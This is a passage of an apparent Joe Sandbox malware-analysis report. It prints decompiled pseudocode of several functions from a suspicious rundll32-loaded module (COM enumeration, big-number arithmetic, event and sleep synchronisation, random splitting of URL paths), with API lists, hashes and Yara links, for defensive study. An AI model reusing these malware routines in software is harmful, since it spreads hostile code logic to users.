					if(_t118 >= 0) {
						__imp__#2(0x428c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x428d2a8; // 0xaea5a8
												_t28 = _t109 + 0x428e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x428d2a8; // 0xaea5a8
														_t33 = _t79 + 0x428e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                0x04284e0a
                                0x04284e13
                                0x04284e14
                                0x04284e18
                                0x04284e1e
                                0x04284e24
                                0x04284e2d
                                0x04284e33
                                0x04284e3d
                                0x04284e3f
                                0x04284e45
                                0x04284e4a
                                0x04284e55
                                0x04284e5b
                                0x04284e60
                                0x04284f82
                                0x04284e66
                                0x04284e66
                                0x04284e73
                                0x04284e79
                                0x04284e7f
                                0x04284e83
                                0x04284e89
                                0x04284e96
                                0x04284e9a
                                0x04284ea0
                                0x04284ea3
                                0x04284eab
                                0x04284eac
                                0x04284eb0
                                0x04284eb4
                                0x04284eb7
                                0x04284eba
                                0x04284ec0
                                0x04284ec9
                                0x04284ecf
                                0x04284ed0
                                0x04284ed3
                                0x04284ed4
                                0x04284ed5
                                0x04284edd
                                0x04284ede
                                0x04284edf
                                0x04284ee1
                                0x04284ee5
                                0x04284ee9
                                0x00000000
                                0x00000000
                                0x04284eef
                                0x04284ef8
                                0x04284efe
                                0x04284f08
                                0x04284f0c
                                0x04284f0e
                                0x04284f1b
                                0x04284f1f
                                0x04284f27
                                0x04284f2c
                                0x04284f3e
                                0x04284f40
                                0x04284f46
                                0x04284f46
                                0x04284f4f
                                0x04284f4f
                                0x04284f51
                                0x04284f57
                                0x04284f57
                                0x04284f5a
                                0x04284f60
                                0x04284f63
                                0x04284f6c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04284f6c
                                0x04284ec0
                                0x04284eba
                                0x04284ea3
                                0x04284f72
                                0x04284f72
                                0x04284f78
                                0x04284f78
                                0x04284f7e
                                0x04284f7e
                                0x04284f87
                                0x04284f8d
                                0x04284f8d
                                0x04284e4a
                                0x04284f96

                                APIs
                                • SysAllocString.OLEAUT32(0428C290), ref: 04284E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04284F36
                                • SysFreeString.OLEAUT32(00000000), ref: 04284F4F
                                • SysFreeString.OLEAUT32(?), ref: 04284F7E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 33807a3b82fbb8baedd1e5a485aac7c65487af38308dee1283dd8baf4c59627d
                                • Instruction ID: 2e46df5c4569b8d9bdb33efa1509539072e377de3ba3dd7b6459fbbb6d4d1374
                                • Opcode Fuzzy Hash: 33807a3b82fbb8baedd1e5a485aac7c65487af38308dee1283dd8baf4c59627d
                                • Instruction Fuzzy Hash: A4516F75E0150AEFCB00EFA8D488DAEB7B9EF88704B15458CE915EB251E771AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 042813B6
                                • SysFreeString.OLEAUT32(00000000), ref: 0428149B
                                  • Part of subcall function 04284E05: SysAllocString.OLEAUT32(0428C290), ref: 04284E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 042814EE
                                • SysFreeString.OLEAUT32(00000000), ref: 042814FD
                                  • Part of subcall function 042852B9: Sleep.KERNEL32(000001F4), ref: 04285301
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: bc0c8b3862fe4497d4a15a72abb08b6aebb9fe602092c0dc2dbcb42ba8ad0f07
                                • Instruction ID: 3712ef8956b5930e4fbcf14dc6b9950760b68ee43decdc0aefb684f68f30b0bf
                                • Opcode Fuzzy Hash: bc0c8b3862fe4497d4a15a72abb08b6aebb9fe602092c0dc2dbcb42ba8ad0f07
                                • Instruction Fuzzy Hash: A551B135611609EFDB01DFA8D844AAEB3B6FF88750B14842CE505EB290DB71FD56CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 042829ED, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E042829ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04288B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04284AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04282F01(_t101,  &_v236, _a8, _t96 - _t81);
					E04282F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04284AA4(_t101, 0x428d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04284AA4(_a16, _a4);
						E042828BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0428AF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0428AF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04289947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04284506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E0428A708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x428d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x042829f0
                                0x042829fc
                                0x04282a02
                                0x04282a07
                                0x04282a0b
                                0x04282b68
                                0x04282b6c
                                0x04282b6c
                                0x04282a11
                                0x04282a15
                                0x04282a19
                                0x04282a1c
                                0x04282a27
                                0x04282a2d
                                0x04282a32
                                0x04282a35
                                0x04282a4f
                                0x04282a5b
                                0x04282a64
                                0x04282a6e
                                0x04282a73
                                0x04282a75
                                0x04282a78
                                0x04282b26
                                0x04282b2c
                                0x04282b3d
                                0x04282b50
                                0x04282b60
                                0x00000000
                                0x04282b65
                                0x04282a81
                                0x04282a88
                                0x04282a8c
                                0x04282a92
                                0x04282a94
                                0x04282a96
                                0x04282a98
                                0x04282a9a
                                0x04282aa4
                                0x04282aa9
                                0x04282aab
                                0x04282aad
                                0x04282aae
                                0x04282aaf
                                0x04282ab0
                                0x04282ab7
                                0x04282abe
                                0x04282ac1
                                0x04282ac1
                                0x04282a8e
                                0x04282a8e
                                0x04282a8e
                                0x04282ac9
                                0x04282ad1
                                0x04282ada
                                0x04282adf
                                0x04282adf
                                0x04282ae4
                                0x00000000
                                0x00000000
                                0x04282ae6
                                0x04282ae9
                                0x04282af3
                                0x00000000
                                0x00000000
                                0x04282af5
                                0x04282af5
                                0x04282aff
                                0x04282adf
                                0x04282ae4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04282ae4
                                0x04282b09
                                0x04282b0c
                                0x04282b0f
                                0x04282b16
                                0x04282b16
                                0x04282b23
                                0x00000000
                                0x04282b23
                                0x04282a1e
                                0x04282a22
                                0x04282a23
                                0x04282a25
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04282a25
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04282A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04282AB0
                                • memset.NTDLL ref: 04282B50
                                • memset.NTDLL ref: 04282B60
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: dc0cc056235568c0598edaac0a7bcafe62cc4c775a9823c7ff256e18c637e56c
                                • Instruction ID: 7ef4249fee4bb0949fb325847aa2407291bbebf99c40519964972b85b8de9dba
                                • Opcode Fuzzy Hash: dc0cc056235568c0598edaac0a7bcafe62cc4c775a9823c7ff256e18c637e56c
                                • Instruction Fuzzy Hash: 73416F71B2120AEBEB20FFA8CC40BAE7765EF54714F10856DB915AB1C0EB71B954CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04286150, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E04286150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x428d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x428d2a8; // 0xaea5a8
				_t3 = _t8 + 0x428e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E042810B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x428d2ac, 1, 0, _t30);
					E04288B22(_t30);
				}
				_t12 =  *0x428d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04288F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04283485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x428d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04288B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                0x04286151
                                0x04286158
                                0x04286162
                                0x04286166
                                0x0428616c
                                0x0428617b
                                0x04286182
                                0x04286186
                                0x04286198
                                0x0428619a
                                0x0428619a
                                0x0428619f
                                0x042861a6
                                0x042861fd
                                0x042861fd
                                0x04286203
                                0x04286205
                                0x04286205
                                0x0428620f
                                0x04286213
                                0x04286225
                                0x04286225
                                0x04286229
                                0x0428622f
                                0x0428622f
                                0x00000000
                                0x042861bf
                                0x042861c4
                                0x042861cc
                                0x042861d0
                                0x042861d4
                                0x042861d4
                                0x042861e1
                                0x042861e5
                                0x042861e9
                                0x0428623e
                                0x04286244
                                0x04286244
                                0x042861f7
                                0x042861fb
                                0x04286232
                                0x04286234
                                0x04286237
                                0x04286237
                                0x00000000
                                0x04286234
                                0x042861fb
                                0x00000000
                                0x042861e5

                                APIs
                                  • Part of subcall function 042810B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04D79D18,00000000,?,?,69B25F44,00000005,0428D00C,?,?,042830FE), ref: 042810E7
                                  • Part of subcall function 042810B1: lstrcpy.KERNEL32(00000000,00000000), ref: 0428110B
                                  • Part of subcall function 042810B1: lstrcat.KERNEL32(00000000,00000000), ref: 04281113
                                • CreateEventA.KERNEL32(0428D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0428991F,?,00000001,?), ref: 04286191
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,0428991F,00000000,00000000,?,00000000,?,0428991F,?,00000001,?,?,?,?,04287D37), ref: 042861F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,0428991F,?,00000001,?), ref: 0428621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0428991F,?,00000001,?,?,?,?,04287D37), ref: 04286237
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: b8e47ffb36c39a9c4020b67d90068b5929d5e2ffd8cb0851f58f5676fda5a3fb
                                • Instruction ID: b2f1886387c8829db95b7a4c2d44dd52db439093cdf6c40154ac0f02cde20333
                                • Opcode Fuzzy Hash: b8e47ffb36c39a9c4020b67d90068b5929d5e2ffd8cb0851f58f5676fda5a3fb
                                • Instruction Fuzzy Hash: 7721E4327233125BD7217E68AC48A6F7399EB88B55F19062DF945D72CADF34EC018650
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04289870, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 40%
                                			E04289870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04282931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04288DAB(_t23);
						}
					}
					return _t38;
				}
				if(E0428155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x428d2ac, 1, 0,  *0x428d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04285BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04284B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04284FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04286150( &_v32, _t39);
					goto L13;
				}
			}












                                0x04289870
                                0x0428987d
                                0x04289883
                                0x04289884
                                0x04289885
                                0x04289886
                                0x04289887
                                0x0428988b
                                0x04289897
                                0x0428989b
                                0x04289923
                                0x04289923
                                0x04289926
                                0x04289928
                                0x04289930
                                0x04289930
                                0x04289936
                                0x04289939
                                0x04289939
                                0x04289936
                                0x04289944
                                0x04289944
                                0x042898ae
                                0x042898b0
                                0x042898b0
                                0x042898c7
                                0x042898cb
                                0x042898ce
                                0x042898d9
                                0x042898e0
                                0x042898e0
                                0x042898e9
                                0x042898ed
                                0x042898fb
                                0x042898ef
                                0x042898ef
                                0x042898f0
                                0x042898f1
                                0x042898f2
                                0x042898f3
                                0x042898f4
                                0x042898f4
                                0x04289900
                                0x04289903
                                0x04289907
                                0x04289909
                                0x04289909
                                0x04289910
                                0x00000000
                                0x04289912
                                0x04289912
                                0x0428991f
                                0x00000000
                                0x0428991f

                                APIs
                                • CreateEventA.KERNEL32(0428D2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,04287D37,?,00000001,?), ref: 042898C1
                                • SetEvent.KERNEL32(00000000,?,?,?,04287D37,?,00000001,?,00000002,?,?,0428312C,?), ref: 042898CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,04287D37,?,00000001,?,00000002,?,?,0428312C,?), ref: 042898D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,04287D37,?,00000001,?,00000002,?,?,0428312C,?), ref: 042898E0
                                  • Part of subcall function 04285BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,04289900,?,04289900,?,?,?,?,?,04289900,?), ref: 04285C9A
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: 178daf3cafd9a3df1ff1a1a4b4acb763732d14221b90af685bf1daf9ea9042a5
                                • Instruction ID: adfeb7d88761494849c9ba8b7e398c3705e6be5f1dcdc255c6a59a6d686ed678
                                • Opcode Fuzzy Hash: 178daf3cafd9a3df1ff1a1a4b4acb763732d14221b90af685bf1daf9ea9042a5
                                • Instruction Fuzzy Hash: 7E21CB73F1221AABDB107FE998849FE7378DF44354B04442DEA11A7180E774B9858BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04285F58, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E04285F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04281525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x04285f64
                                0x04285f68
                                0x04285f69
                                0x04285f6a
                                0x04285f6c
                                0x04285f6e
                                0x04285f71
                                0x04285f76
                                0x0428600d
                                0x04286014
                                0x04286014
                                0x04285f7f
                                0x04285f86
                                0x04285f96
                                0x04285f96
                                0x04285f9c
                                0x04285f9e
                                0x04285fa3
                                0x04285fac
                                0x04285fb2
                                0x04285fb7
                                0x04285fc2
                                0x04285fc6
                                0x04285fc8
                                0x04285fc9
                                0x04285fd2
                                0x04285fd6
                                0x04285fe7
                                0x04285fd8
                                0x04285fdd
                                0x04285fe2
                                0x04285ff1
                                0x04285ff1
                                0x04285fc6
                                0x04285ff7
                                0x04285ffd
                                0x04285ffd
                                0x04286006
                                0x0428600b
                                0x0428600b
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: b15f0cd278b57904a391ca44548938d9c7729724be7f562661ab16dbf8e07f2c
                                • Instruction ID: 3e8d42a1bfc90a264bffeff2c778464254a11b128e25285081258d28370c3ac3
                                • Opcode Fuzzy Hash: b15f0cd278b57904a391ca44548938d9c7729724be7f562661ab16dbf8e07f2c
                                • Instruction Fuzzy Hash: 13216275A0220AFFCB11EFA8D88899EBBB5FF49340B10416DE905D7240EB70EA44CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428A41C, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E0428A41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x428d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x428d250; // 0x82dfa935
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x428d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x0428a424
                                0x0428a427
                                0x0428a42d
                                0x0428a445
                                0x0428a447
                                0x0428a44c
                                0x0428a44e
                                0x0428a451
                                0x0428a453
                                0x0428a456
                                0x0428a458
                                0x0428a458
                                0x0428a45a
                                0x0428a465
                                0x0428a46a
                                0x0428a47b
                                0x0428a483
                                0x0428a488
                                0x0428a48b
                                0x0428a48e
                                0x0428a490
                                0x0428a493
                                0x0428a496
                                0x0428a496
                                0x0428a499
                                0x0428a4a4
                                0x0428a4a9
                                0x0428a4b3

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04287C20,00000000,?,?,04289DA0,?,04D795B0), ref: 0428A427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0428A43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04287C20,00000000,?,?,04289DA0,?,04D795B0), ref: 0428A483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 0428A4A4
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 72028f5d2aeb33f56763df4ac8e86c94dc673ac123a59d9e8f9d937bec00e593
                                • Instruction ID: e96ec6c43a6b3e0ca11f644d905c9bebbcd3ba8c06735a3c69009d862ffb9950
                                • Opcode Fuzzy Hash: 72028f5d2aeb33f56763df4ac8e86c94dc673ac123a59d9e8f9d937bec00e593
                                • Instruction Fuzzy Hash: AD110672B12115AFD7109A6DDC88D9EBBBEDBC4361B05027AF5049B181EB74AE04C760
                                Uniqueness

                                Uniqueness Score: -1.00%

